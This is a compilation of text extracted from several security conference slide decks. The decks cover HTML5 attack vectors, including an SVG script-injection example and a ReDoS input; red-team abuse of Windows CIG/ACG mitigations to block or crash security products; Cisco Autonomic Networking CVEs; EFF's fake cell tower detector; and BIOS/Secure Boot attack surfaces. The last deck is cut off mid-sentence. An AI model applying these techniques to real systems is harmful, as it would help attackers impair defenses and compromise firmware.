(fixed) •  What  if  an  inline  SVG  call  contains  JavaScript  and  HTML?  Example  (this  works  in Firefox  <  4  but  not  in  Chrome  <  7):  <svg xmlns="http://www.w3.org/ 2000/svg"><script>alert(1)</script></svg> •  PotenYal  client-­‐side  ReDoS  via  padern  adribute  in  input  (Opera  10+) –  Example:  <input pattern="^((a+.)a)+$" value="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa…" /> Summary •  A  lot  of  same  old  problems,  same  old  resoluYons (read:  common  sense,  input  validaYon,  be  careful connecYng  to  an  unsecured  network  /  public  Wi-­‐ Fi) •  Important  to  remember:  HTML5  standard  is  sYll work-­‐in-­‐progress,  being  finalized,  and  evolving... •  ...but  at  the  same  Yme,  the  spike  of  i{Phone,  Pod Touch,  Pad},  Android,  and  other  mobile  devices that  do  not  support  Flash  has  spurred  the  growth and  interest  in  HTML5.  Alas,  HTML5  and  its security  issues  cannot  be  ignored. References  and  Resources •  HTML5 –  hdp://www.html5rocks.com/ –  hdp://html5doctor.com/introducing-­‐web-­‐sql-­‐databases/ –  hdp://www.webreference.com/authoring/languages/html/HTML5-­‐Client-­‐Side/ •  HTML5  Security –  hdp://www.darkreading.com/vulnerability-­‐management/167901026/security/applicaYon-­‐security/ 224701560/index.html –  hdp://www.nyYmes.com/external/idg/2010/08/20/20idg-­‐html5-­‐raises-­‐new-­‐security-­‐issues-­‐59174.html –  hdp://www.veracode.com/blog/2010/05/html5-­‐security-­‐in-­‐a-­‐nutshell/ –  hdp://www.eweek.com/c/a/Security/HTML5-­‐Security-­‐Facts-­‐Developers-­‐Should-­‐Keep-­‐in-­‐Mind-­‐551353/ –  hdp://threatpost.com/en_us/blogs/security-­‐concern-­‐html5-­‐gains-­‐tracYon-­‐091610 –  hdp://stackoverflow.com/quesYons/787067/is-­‐there-­‐a-­‐xdomainrequest-­‐equivalent-­‐in-­‐firefox –  hdp://www.andlabs.org/html5.html –  hdp://heideri.ch/jso/ –  hdp://code.google.com/p/html5security/ –  hdp://michael-­‐coates.blogspot.com/2010/07/html5-­‐local-­‐storage-­‐and-­‐xss.html –  hdp://spareclockcycles.org/2010/12/19/d0z-­‐me-­‐the-­‐evil-­‐url-­‐shortener/ –  hdp://blogs.forbes.com/andygreenberg/2010/11/04/html5-­‐tricks-­‐hijack-­‐browsers-­‐to-­‐crack-­‐passwords-­‐ spew-­‐spam/ –  hdp://mashable.com/2011/04/29/html5-­‐web-­‐security/
pdf
剑走偏锋 —蓝军实战缓解措施滥用 # Whoami • @askme765cs • 安全研究员@绿盟科技 • M01N战队核心成员 • 专注系统安全与终端对抗 目录 CONTENTS 01 02 03 Mitigations 101 Red Team Operation "Mitigation Hell" Part 01 Mitigations 101 01 Why Mitigations? 漏洞利用两种常见路径 • 数据破坏 • 代码执行 利用过程中的动作与特征 • 修改代码段 • 加载DLL • 创建新进程 • … Mitigations的效用 • 截断利用链,削减机会窗口 • 对抗未知威胁与潜在攻击 02 Mitigations Timeline • ASLR • DEP • SafeSEH • SEHOP • CFG • CIG • ACG • Child Process Policy • CFG Strict Mode • CFG Export Suppression • NoLowMandatoryLabelImages • … Pre-Win10 TH1 RS1 RS2 RS3 + 03 Code intergerity guard-CIG • Windows 10 TH2 (1511)引入 • 阻止恶意DLL注入受保护应用程序 • 对加载DLL的签名进行验证 • 仅允许可信签名的DLL加载 • MicrosoftSignedOnly • StoreSignedOnly • 内核主要检查代码位于 MiValidateSectionSigningPolicy • 受影响的API NtCreateSection 04 Arbitrary code guard-ACG • Windows 10 RS1 (1607)引入 • 贯彻W^X原则 • 禁止修改已有代码(X)修改为可写(W) • 禁止修改可写数据(W)修改为可执行(X) • 禁止分配或映射新的可执行内存 • 内核主要检查代码位于 MiAllowProtectionChange MiMapViewOfSection • 受影响的API NtAllocateVirtualMemory NtProtectVirtualMemory NtMapViewOfSection(SEC_IMAGE/SEC_FILE) Arbitrary code guard-ACG 05 • 用户态API • VirtualAlloc with PAGE_EXECUTE_* • VirtualProtect with PAGE_EXECUTE_* • MapViewOfFile with FILE_MAP_EXECUTE | FILE_MAP_WRITE • SetProcessValidCallTargets for CFG Boundary of ACG 06 • 只能限制程序本身,不能阻止其他程序对其的修改 • 开启AllowRemoteDowngrade则可通过其他程序关闭ACG 08 Mitigation Flags-EPROCESS ULONG Flags、Flags2、Flags3、Flags4 ULONG MitigationFlags、MitigationFlags2 09 Mitigation Policy-注册表 设置指定名称\路径程序的Mitigation Policy-IFEO • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ • MitigationOptions:REG_BINARY 系统全局Mitigation Policy • HKLM\System\CurrentControlSet\Control\Session Manager\kernel\ • MitigationOptions:REG_BINARY 10 Mitigation Policy-注册表 11 Mitigation Policy-Powershell 查看程序Mitigation Policy(从程序读取) • Get-ProcessMitigation –Running –Name notepad.exe 查看程序Mitigation Policy(从注册表读取) • Get-ProcessMitigation -Name notepad.exe 设置程序Mitigation Policy(写入注册表) • Set-ProcessMitigation -Name notepad.exe -Enable MicrosoftSignedOnly 12 13 系统设置 • 设置系统全局Mitiation Policy • CFG、DEP、强制ASLR等 程序设置 • 设置单个程序Mitigation Policy • 图形化、用户友好 Mitigation Policy-Exploit Protection Part 02 Red Team Operation 14 CobaltStrike Blockdlls • CobaltStirke 3.14版本中引入 • 开启后子进程只能加载微软签名的DLL • 一些后渗透指令受益于blockdlls • Spawn • Screenshot • Keylogger • Mimikatz • … 15 16 Blockdlls原理-CIG滥用 • UpdateProcThreadAttribute • 子进程中开启CIG • 阻止部分安全产品DLL注入 若DLL有微软签名? 17 18 更进一步,阻击HOOK • CIG无法阻止签名DLL的加载 • ACG可阻止对代码段的修改 • 利用ACG阻止DLL对代码段的修改 EDR DLL Malware .text System DLLs 19 ACG+CIG防线 DL L 签名 加载 Y N CIG Hook AC G 注入 20 实时修改自身Mitigation Policy • SetProcessMitigationPolicy • 底层调用NtSetInformationProcess • 可实时开启CIG、ACG等Mitigations • 开启后无法由自身关闭 21 实时修改其他程序Mitigation Policy • NtSetInformationProcess • 只能修改ACG • 开启AllowRemoteDowngrade 可关闭ACG Part 03 "Mitigation Hell" 22 Side Effect Of Mitigations “Mitigation Hell”——利用缓解措施使程序失去可用性乃至崩溃 • ACG-无法修改自身代码,导致具有自解密、自修改行为的程序失败 -杀死几乎所有.NET程序,CLR初始化依赖于RWX内存 • CIG-无法加载非微软签名的组件,导致运行异常或失败 • Child Process Policy-破坏依赖子进程创建的进程,例如守护进程 若将Mitigations强制应用于未适配的安全软件会如何? 23 剑走偏锋,利用"Mitigation Hell"击破安全防线 • 修改特定安全产品关键程序Mitigation Policy,破坏可用性 安全产品A-自修改行为+ACG=>闪 退 安全产品B-未签名DLL+CIG=>初始化错 误 ATT&CK T1562 Impair Defenses 防御削弱 24 • 修改或禁用安全产品 • 破坏日志记录机制 • 清除历史日志信息 • 限制关键IFEO注册表项修改 25 Hunting "Mitigation Hell"-Audit Mode Audit审计模式-记录日志而不阻止 Set-ProcessMitigation -Name notepad.exe -Enable AuditDynamicCode,AuditMicrosoftSigned 日志记录 Microsoft-Windows-Security-Mitigation/Kernel Mode 26 Hunting "Mitigation Hell"-ETW • Microsoft-Windows-Kernel-Memory:KERNEL_MEM_KEYWORD_ACG • Microsoft-Windows-Security-Mitigations:Microsoft-Windows-Security-Mitigations/KernelMode 观点总结 27 • Mitigations带来的不止是“安全”,亦为新的利用方式埋下伏笔 • 终端对抗领域Mitigations的利用已不鲜见,攻防一体两面,没有银弹 • 对安全软件强制开启缓解措施,有破坏其可用性的可能,是一种行之有效的手段 感谢观看! KCon 汇聚黑客的智慧 感谢观看! 演讲者:绿盟科技 顾佳伟
pdf
Hack Like the Movie Stars: A Big-Screen Multi-Touch Network Monitor George Louthan & Cody Pollet & John Hale Computer Science / www.isec.utulsa.edu Overview • Multi-touch interfaces – What is multi-touch? • This rhetorical question will not be dignified with a response. – Optical multi-touch methods • Our big board – History, building process – Other uses • The tool: DVNE – Architecture – Future plans Computer Science / www.isec.utulsa.edu Multi-touch Methods • Electronic – Capacitive (iPhone) – Hard to build at home • Optical – Main idea: capture infrared blobs with a camera Computer Science / www.isec.utulsa.edu Optical Multi-touch • The question: how to illuminate the touches? • Rear Diffused Illumination – Example: Microsoft Surface – IR shines out of the screen, illuminating objects Computer Science / www.isec.utulsa.edu Optical Multi-touch • Frustrated Total Internal Reflection – Shine light into the edges of plexiglass – Touching the glass causes it to flex and emit light – This is what we use Computer Science / www.isec.utulsa.edu Our big screen • AKA That Thing I Keep Tripping Over – FTIR method – 56” diagonal, 16:9 aspect ratio (roughly 48”x30”) – 1280 x 800 – Plexiglass construction – Laminated vellum projection screen – 168 IR LEDs – PlayStation Eye camera Computer Science / www.isec.utulsa.edu Our big screen Computer Science / www.isec.utulsa.edu Architecture • Touch signals over UDP – TUIO Protocol Computer Science / www.isec.utulsa.edu What do we DO with it? • Some ongoing projects – Immersive collaboration (multi-touch caves) – Educational software (we're building tables for schools) • But we're a security lab – We also like campy movies. (“It's a UNIX system!”) Computer Science / www.isec.utulsa.edu We also play games ... Computer Science / www.isec.utulsa.edu DVNE • Dynamic Visualization for Network Environments – Primary goal: to build a flashy Hollywood-style computer interface – Secondary goal: build something useful for looking at networks • Network monitor – Track TCP streams, identify protocol using signatures • Interface – Python with pymt multitouch extensions – TUIO Computer Science / www.isec.utulsa.edu Resources • Natural User Interface Group – http://www.nuigroup.com • PyMT – http://pymt.txzone.net • Pyglet – http://www.pyglet.org Computer Science / www.isec.utulsa.edu Acknowledgements Support for this research through the National Science Foundation Cyber Trust Program (Award Number 0524740) is gratefully acknowledged.
pdf
<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Detecting Fake 4G Base Stations in Real Time Cooper Quintin - Senior Security Researcher - EFF Threat Lab Defcon Safe Mode With Networking 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Intro • Cooper Quintin – Senior security researcher – Has a toddler (dad jokes) – Former teenage phone phreak • EFF – Member supported non profit – Defending civil liberties – 30 years • Threat lab <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Yomna! None of this research would have been possible without her hard work. This is as much her project as mine. Twitter: @rival_elf Actual photo of Yomna <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Technology that Targets At Risk People • Activists, human rights defenders, journalists, domestic abuse victims, immigrants, sex workers, minority groups, political dissidents, etc… • Goals of this technology – Gather intelligence on opposition – Spy extraterritorially or illegally – Locate and capture – Extortion – Harass and intimidate – Stifle freedom of expression <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Jeff Bezos Can Afford a Security Team Cybersecurity and AV companies care about the types of malware that affects their customers (usually enterprise.) We get to care about the types of technology the infringe on civil liberties and human rights of at risk people. This guy is not at risk. <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Our Goals • Protect people • Broaden our communities` understanding of threats and defenses • Expose bad actors • Make better laws <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Project Dark Caracal Stalkerware <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What We are Going to Talk About Today • Cell-site simulators AKA Stingrays or IMSI Catchers • How they work • Previous efforts to detect them • A new method to detect them • How to fix the problem <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview • UE - The phone - User Equipment • IMSI - International Mobile Subscriber ID - ID for the SIM card • IMEI - International Mobile Equipment ID - ID for the hardware • eNodeB - Base station, what the UE is actually communicating with. • EARFCN - The frequency a UE/EnodeB is transmitting on • Sector - A specific antenna on the base station <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview • MIB - Master Information block, broadcast by the enodeb and tells where to find the SIB • SIB - System information block, contains details about the enodeb • MCC / MNC / TAC - Mobile Country Code, Mobile Network Code, Tracking Area Code • PLMN = MCC + MNC, Public Land Mobile Network <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview IMSI catcher, Stingray, Hailstorm, fake base station == cell-site simulator (CSS) This is acronym hell and I’m sorry. <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cell Technology Overview <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Stingray <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What Changed Between 2G and 4G • eNodeB and UE mutually authenticate • Better encryption between eNodeB and UE • No longer naively connect to the strongest tower <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How do 4G CSS Work • What are the vulns next gen CSS are taking advantage of? • Pre authentication handshake attacks • Downgrade attacks Gotta catch em all whitepaper by Yomna <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Pre-Authentication Vulnerabilities • 4G has a glass jaw • Even though the UE authenticates the tower there are still several messages that it sends, receives, and trusts before authentication happens or w/o authentication • This is the weak spot in which the vast majority of 4G attacks happen <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Hus Insecure Connection Bootstrapping in Cellular Networks:The Root of All Evil - Hussein et al 2019 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Hus Insecure Connection Bootstrapping in Cellular Networks:The Root of All Evil - Hussein et al 2019 Here there be dragons <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How Often are CSS Being Used • ICE/DHS - hundreds of times per year – https://www.aclu.org/news/immigrants-rights/ice-records-confirm -that-immigration-enforcement-agencies-are-using-invasive-cell-p hone-surveillance-devices/ • Local law enforcement – Oakland - 1-3 times per year • https://oaklandprivacy.org/oakland-privacy-sues-vallejo/ – Santa Barbara PD - 231 times in 2017 • https://www.eff.org/deeplinks/2019/05/eff-asks-san-bernardino-court-rev iew-device-search-and-cell-site-simulator <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How Often are CSS Being Used • Foreign Spies – IMSI Catchers in DC • Cyber Mercenaries – NSO Group https://www.amnestyusa.org/wp-content/uploads/2020/06/Moro cco-NSO-Group-report.pdf • Criminals – https://venturebeat.com/2014/09/18/the-cell-tower-mystery-grip ping-america-has-now-been-solved-or-has-it/ <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS App Based • AIMSICD • Snoop Snitch • Darshark Strengths • Cheap • Easy to use Weaknesses • Limited data • Lots of false positives • False negatives? <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS Radio Based • Seaglass • SITCH • Overwatch Strengths • Better data • Lower level information Weaknesses • Harder to set up, use, interpret • Cost of hardware • Can’t transmit <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Previous Efforts to Detect CSS <location, date> <Location, date> Defcon Safe Mode // Aug 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Can we detect 4G IMSI Catchers? • How can we improve on previous attempts – Lower level data – See all towers not just what we are connecting to – Compare that data over time – Look at 4G antennas! – Verify results! <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Introducing Crocodile Hunter <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Software Stack • Backend based on SRSLTE – Open source LTE software stack – Written in C++ – Communicates with frontend over a local socket • Python for heuristics, database and frontend – Get data from socket – Add it to database – Run heuristics – Display tower locations • API for sharing data <location, date> <Location, date> Defcon Safe Mode // Aug 2020 <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Hardware Stack • Laptop / Raspberry Pi • USB GPS Dongle • SDR compatible with SRSLTE: BladeRF, Ettus B200 • LTE Antennas • (Battery for Pi) <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Crocodile Hunter Hardware Stack <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Workflow 1. Decode MIB and SIB1 for all the cells that we can see and record them. 2. Map the probable location of cells 3. Look for anomalies in the readings 4. Locate suspicious cells and confirm results <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Decode MIB and SIB1 • SRSLTE scans a list of EARFCNS • If we find a mib we decode mib and sib and send over socket <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Database <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Mapping out antennas in real time • Using trilateration and distance estimates we can figure out where all the towers are • Compare this to a ground truth such as wigle or opencellid <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Triangulation (Bearing) L = B₁∩B₂∩B₃ Trilateration vs Triangulation Trilateration L = R₁∩R₂∩R₃ x° y° d <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Looking for Anomalies • Cells moving • Cells that change signal strength • Cells that aren’t where they should be • Cells changing parameters • Cells missing parameters • New cells • Anomaly != CSS, that's why we have to verify <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Why Don’t we Transmit? EFF Lawyers <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What we Found so Far Cell on wheels at Dreamforce <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What we Found so Far • Suspicious foreign towers in DC Suspicious eNodeBs in Washington DC <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Washington DC <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Ongoing Tests • Latin America (FADe Project) • DC • NYC • Your hometown (coming soon…) <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Future Work • Better heuristics • Better location finding • Machine learning for detection of anomalies • Port to cheaper hardware <location, date> <Location, date> Defcon Safe Mode // Aug 2020 What’s With the Name? Press F to pay respects to Steve <location, date> <Location, date> Defcon Safe Mode // Aug 2020 How Can we Stop Cell-Site Simulators • End 2G support on iOS and Android now! – https://www.eff.org/deeplinks/2020/06/your-phone-vulnerable-be cause-2g-it-doesnt-have-be • Eliminate pre-authentication messages – TLS for the handshake with towers • More incentives for standards orgs (3GPP), carriers, manufacturers, and OEMs to care about user privacy • Nothing is foolproof but we aren’t even doing the bare minimum yet. <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Key Takeaways • We have a pretty good understanding the vulns in 4G which commercial cell-site simulators might exploit • None of the previous IMSI catcher detector apps really do the job any more. • We have come up with a method similar to established methods but targeting 4G. • The worst problems of CSS abuse can be solved! <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Thanks to the following people • Yomna! • The whole EFF crew • Andy and Bob at Wigle • Roger Piqueras-Jover • Nima Fatemi with Kandoo, Surya Mattu, Simon • Carlos and the FADE Project • Karl Kosher, Peter Ney, and others at UW (SEAGLASS) • Ash wilson (SITCH) and Eric Escobar (Defcon Justice Beaver) • Kristin Paget <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cooper Quintin Senior Security Researcher EFF Threat Lab cooperq@eff.org - twitter: @cooperq https://github.com/efforg/crocodilehunter Thank you! <location, date> <Location, date> Defcon Safe Mode // Aug 2020 References 1. https://www.eff.org/wp/gotta-catch-em-all-understanding-ho w-imsi-catchers-exploit-cell-networks 2. https://github.com/srsLTE/srsLTE 3. https://arxiv.org/pdf/1710.08932.pdf 4. https://www.usenix.org/system/files/conference/woot17/woo t17-paper-park.pdf 5. https://seaglass-web.s3.amazonaws.com/SeaGlass___PETS_20 17.pdf 6. https://www.sba-research.org/wp-content/uploads/publicatio ns/DabrowskiEtAl-IMSI-Catcher-Catcher-ACSAC2014.pdf
pdf
1 Attacking Autonomic Networks 2 Agenda o o o o 3 Autonomic Systems o o 4 Autonomic Network o o o o credits 5 Live Demo 6 Demo Results o o o 7 Cisco Deployment o o o o 8 Channel Discovery o o 9 Adjacency Discovery o o o o o 10 Adjacency Discovery I support network/domain X I am part of domain <domain name> Registrar Enrollee Registrar domain certificate Generate 3072- RSA key Send public key Enrollee domain certificate 11 Secure Channel o o o o o o o 12 Registrar Configuration autonomic registrar domain-id ERNW.de whitelist flash:whitelist.txt CA local no shut autonomic 13 Enrollee Configuration o o o o autonomic 14 Autonomic Effect o o o o o o o 15 Are you in Control? 16 Autonomic Network: Under The Hood 17 Channel Discovery 18 Channel Discovery 19 Channel Discovery 20 Channel Discovery 21 Channel Discovery 22 Channel Discovery 23 Channel Discovery 24 Channel Discovery 25 Adjacency Discovery 26 Adjacency Discovery 27 Adjacency Discovery 28 Adjacency Discovery 29 Adjacency Discovery 30 Adjacency Discovery 31 Adjacency Discovery 32 Adjacency Discovery 33 Adjacency Discovery 34 Adjacency Discovery 35 Adjacency Discovery 36 Adjacency Discovery 37 Adjacency Discovery 38 Adjacency Discovery 39 Secure Channel o o o 😉 40 41 Is it Secure? 42 Live Chat Support 43 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! 44 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: …. 45 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Thanks for reporting, we created BugID CSCvd15717. We will check with the BU for that 46 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. 47 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. Me: Wait, what about different domains? Well, this shouldn’t be 48 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. Me: Wait, what about different domains? Well, this shouldn’t be Support: We will add a feature to check domains in the future! 49 Bug: CSCvd15717 o o o o 50 Live Chat Support Me: Hi, I can’t revoke the certificate of one of the accepted nodes. 51 Live Chat Support Me: Hi, I can’t revoke the certificate of one of the accepted nodes. Support: We will check that. Please note the revoking certificates is not supported on local CA. 52 Live Chat Support Me: Hi, I can’t revoke the certificate of one of the accepted nodes. Support: We created CVE-2017-6664 for that. 53 CVE-2017-6664 o o 54 Live Chat Support Me: Hi, the attacker can reset remotely the secure channel every time they are created, not only this the information is also in plain text! 55 Live Chat Support Me: Hi, the attacker can reset remotely the secure channel every time they are created, not only this the information is also in plain text! Support: We created CVE-2017-6665 for that. 56 CVE-2017-6665 o o o 57 Live Chat Support Me: Hi, if the attacker reset the channel multiple times, eventually the node crashes down! 58 Live Chat Support Me: Hi, if the attacker reset the channel multiple times, eventually the node crashes down! Support: We created CVE-2017-6663 for that. 59 CVE-2017-6663 o o 60 Live Chat Support Me: Hi, the attacker can crash the registrar by sending invalid enrollee IDs Support: We created CVE-2017-3849 for that. 61 CVE-2017-3849 o o 62 DeathKiss! 63 CVE-2017-3850 o o o o 64 Conclusion o o o o o o o o 65 Finally… o o o o o o
pdf
Summary of Attacks Against BIOS and Secure Boot Yuriy Bulygin, John Loucaides, Andrew Furtak, Oleksandr Bazhaniuk, Alexander Matrosov Intel Security In The Beginning Was The Legacy BIOS.. Legacy BIOS 1. CPU Reset vector in BIOS ’ROM’ (Boot Block) 2. Basic CPU, chipset initialization 3. Initialize Cache-as-RAM, load and run from cache 4. Initialize DIMMs, create address map.. 5. Enumerate PCIe devices.. 6. Execute Option ROMs on expansion cards 7. Load and execute MBR 8. 2nd Stage Boot Loader OS Loader OS kernel Also Technical Note: UEFI BIOS vs. Legacy BIOS, Advantech Then World Moved to UEFI.. UEFI Boot From Secure Boot, Network Boot, Verified Boot, oh my and almost every publication on UEFI UEFI [Compliant] Firmware SEC Pre-EFI Init (PEI) Driver Exec Env (DXE) Boot Dev Select (BDS) Runtime / OS S-CRTM; Init caches/MTRRs; Cache-as-RAM (NEM); Recovery; TPM Init S-CRTM: Measure DXE/BDS Early CPU/PCH Init Memory (DIMMs, DRAM) Init, SMM Init Continue initialization of platform & devices Enum FV, dispatch drivers (network, I/O, service..) Produce Boot and Runtime Services Boot Manager (Select Boot Device) EFI Shell/Apps; OS Boot Loader(s) ExitBootServices. Minimal UEFI services (Variable) ACPI, UEFI SystemTable, SMBIOS table CPU Reset Signed BIOS Update & OS Secure Boot Signed BIOS Update UEFI Secure Boot Windows 8 Secure Boot Attacks Against Both Of These.. BIOS Attack Surface: SPI Flash Protection System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. SPI Flash Write Protection • Often still not properly enabled on many systems • SMM based write protection of entire BIOS region is often not used: BIOS_CONTROL[SMM_BWP] • If SPI Protected Ranges (mode agnostic) are used (defined by PR0- PR4 in SPI MMIO), they often don’t cover entire BIOS & NVRAM • Some platforms use SPI device specific WP protection but only for boot block/startup code or SPI Flash descriptor region • Persistent BIOS Infection (used coreboot’s flashrom on legacy BIOS) • Evil Maid Just Got Angrier: Why FDE with TPM is Not Secure on Many Systems • BIOS Chronomancy: Fixing the Static Root of Trust for Measurement • A Tale Of One Software Bypass Of Windows 8 Secure Boot • Mitigation: BIOS_CONTROL[SMM_BWP] = 1 and SPI PRx •chipsec_main --module common.bios_wp • Or Copernicus from MITRE SPI Flash (BIOS) Write Protection is Still a Problem SPI Flash & BIOS Is Not Write Protected Checking Manually.. Windows: RWEverything Linux: setpci -s 00:1F.0 DC.B Better Way to Check If Your BIOS Is Write-Protected [*] running module: chipsec.modules.common.bios_wp [x][ ======================================================================= [x][ Module: BIOS Region Write Protection [x][ ======================================================================= [*] BIOS Control = 0x02 [05] SMM_BWP = 0 (SMM BIOS Write Protection) [04] TSS = 0 (Top Swap Status) [01] BLE = 1 (BIOS Lock Enable) [00] BIOSWE = 0 (BIOS Write Enable) [!] Enhanced SMM BIOS region write protection has not been enabled (SMM_BWP is not used) [*] BIOS Region: Base = 0x00500000, Limit = 0x007FFFFF SPI Protected Ranges ------------------------------------------------------------ PRx (offset) | Value | Base | Limit | WP? | RP? ------------------------------------------------------------ PR0 (74) | 87FF0780 | 00780000 | 007FF000 | 1 | 0 PR1 (78) | 00000000 | 00000000 | 00000000 | 0 | 0 PR2 (7C) | 00000000 | 00000000 | 00000000 | 0 | 0 PR3 (80) | 00000000 | 00000000 | 00000000 | 0 | 0 PR4 (84) | 00000000 | 00000000 | 00000000 | 0 | 0 [!] SPI protected ranges write-protect parts of BIOS region (other parts of BIOS can be modified) [!] BIOS should enable all available SMM based write protection mechanisms or configure SPI protected ranges to protect the entire BIOS region [-] FAILED: BIOS is NOT protected completely # chipsec_main.py --module common.bios_wp Demo (Insecure SPI Flash Protection) From Analytics, and Scalability, and UEFI Exploitation by Teddy Reed Patch enables BIOS write protection (sets BIOS_CONTROL[BLE]). Picked up by Subzero. The fix is incomplete though SPI Flash Write Protection • Some systems write-protect BIOS by disabling BIOS Write-Enable (BIOSWE) and setting BIOS Lock Enable (BLE) but don’t use SMM based write-protection BIOS_CONTROL[SMM_BWP] • SMI event is generated when Update SW writes BIOSWE=1 • Possible attack against this configuration is to block SMI events • E.g. disable all chipset sources of SMI: clear SMI_EN[GBL_SMI_EN] if BIOS didn’t lock SMI config: Setup for Failure: Defeating SecureBoot • Another variant is to disable specific TCO SMI source used for BIOSWE/BLE (clear SMI_EN[TCO_EN] if BIOS didn’t lock TCO config.) • Mitigation: BIOS_CONTROL[SMM_BWP] = 1 and lock SMI config •chipsec_main --module common.bios_smi SMI Suppression Attack Variants SPI Flash Write Protection • Some BIOS rely on SPI Protected Range (PR0-PR4 registers in SPI MMIO) to provide write protection of regions of SPI Flash • SPI Flash Controller configuration including PRx has to be locked down by BIOS via Flash Lockdown • If BIOS doesn’t lock SPI Controller configuration (by setting FLOCKDN bit in HSFSTS SPI MMIO register), malware can disable SPI protected ranges re-enabling write access to SPI Flash •chipsec_main --module common.spi_lock Locking SPI Flash Configuration Is SPI Flash Configuration Locked? [+] imported chipsec.modules.common.spi_lock [x][ ======================================================================= [x][ Module: SPI Flash Controller Configuration Lock [x][ ======================================================================= [*] HSFSTS register = 0x0004E008 FLOCKDN = 1 [+] PASSED: SPI Flash Controller configuration is locked BIOS Attack Surface: BIOS Update System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Legacy BIOS Update and Secure Boot • Mebromi malware includes BIOS infector & MBR bootkit components • Patches BIOS ROM binary injecting malicious ISA Option ROM with legitimate BIOS image mod utility • Triggers SW SMI 0x29/0x2F to erase SPI flash then write patched BIOS binary • chipsec_util smi 0x29 0x0 Signed BIOS Updates Are Rare • No concept of Secure or Verified Boot • Wonder why TDL4 and likes flourished? No Signature Checks of OS boot loaders (MBR) UEFI BIOS Update Problems • Unsigned sections within BIOS update (e.g. boot splash logo BMP image) • BIOS displayed the logo before SPI Flash write- protection was enabled • EDK ConvertBmpToGopBlt() integer overflow followed by memory corruption during DXE while parsing BMP image • Copy loop overwrote #PF handler and triggered #PF • Attacking Intel BIOS Parsing of Unsigned BMP Image in UEFI FW Update Binary UEFI BIOS Update Problems • Legacy BIOS with signed BIOS update • OS schedules BIOS update placing new BIOS image in DRAM split into RBU packets • Upon reboot, BIOS Update SMI Handler reconstructs BIOS image from RBU packets in SMRAM and verifies signature • Buffer overflow (memcpy with controlled size/dest/src) when copying RBU packet to a buffer with reconstructed BIOS image • BIOS Chronomancy: Fixing the Core Root of Trust for Measurement • Defeating Signed BIOS Enforcement RBU Packet Parsing Vulnerability BIOS Attack Surface: HW Configuration/Protections System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Problems With HW Configuration/Protections • D_LCK bit locks down Compatible SMM space (a.k.a. CSEG) configuration (SMRAMC) • SMRAMC[D_OPEN]=0 forces access to legacy SMM space decode to system bus rather than to DRAM where SMI handlers are when CPU is not in System Management Mode (SMM) • When D_LCK is not set by BIOS, SMM space decode can be changed to open access to CSEG when CPU is not in SMM: Using CPU SMM to Circumvent OS Security Functions • Also Using SMM For Other Purposes • chipsec_main –-module common.smm Unlocked Compatible/Legacy SMRAM Compatible SMM Space: Normal Decode 0xBFFFF Compatible SMRAM (CSEG) SMM access to CSEG is decoded to DRAM, non-SMM access is sent to system bus 0xA0000 Non SMM access SMRAMC [D_LCK] = 1 SMRAMC [D_OPEN] = 